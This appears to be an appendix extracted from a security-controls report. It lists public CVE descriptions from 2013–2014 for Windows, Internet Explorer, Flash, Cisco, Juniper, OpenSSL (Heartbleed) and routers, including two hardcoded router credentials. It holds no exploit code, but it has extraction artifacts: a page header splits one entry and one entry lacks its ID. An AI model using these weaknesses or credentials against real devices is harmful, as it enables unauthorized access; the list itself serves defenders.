CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.
CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.
CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.
CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."
CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.
CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.
CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.
CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.
CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.
CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.
CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.
CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
